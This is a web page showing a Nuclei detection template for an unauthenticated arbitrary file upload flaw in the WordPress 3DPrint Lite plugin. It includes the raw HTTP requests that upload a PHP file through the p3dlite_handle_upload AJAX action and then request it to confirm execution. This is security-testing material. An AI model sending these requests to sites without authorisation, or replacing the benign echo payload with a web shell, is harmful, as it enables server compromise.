Skip to content
Nuclei Templates

WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload

ID: 3dprint-arbitrary-file-upload

Severity: high

Author: SecTheBit

Tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint

Description

Section titled “Description”

WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: 3dprint-arbitrary-file-upload


info:
  name: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload
  author: SecTheBit
  severity: high
  description: |
    WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Upgrade to 1.9.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
    - https://www.exploit-db.com/exploits/50321
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
  tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint


variables:
  string: "3dprint-arbitrary-file-upload"


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353


        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"


        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename={{randstr}}.php
        Content-Type: text/php


        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--
      - |
        GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4a0a0047304502210092014e2acf3401af56c104fd1cc045a38ee62d7793eecc5e0962c429f73fc1f002207e813d9d93e030d662ea9c28e935a97042af0cc1cdbc8374c67d6742cb7a8814:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml"

View on Github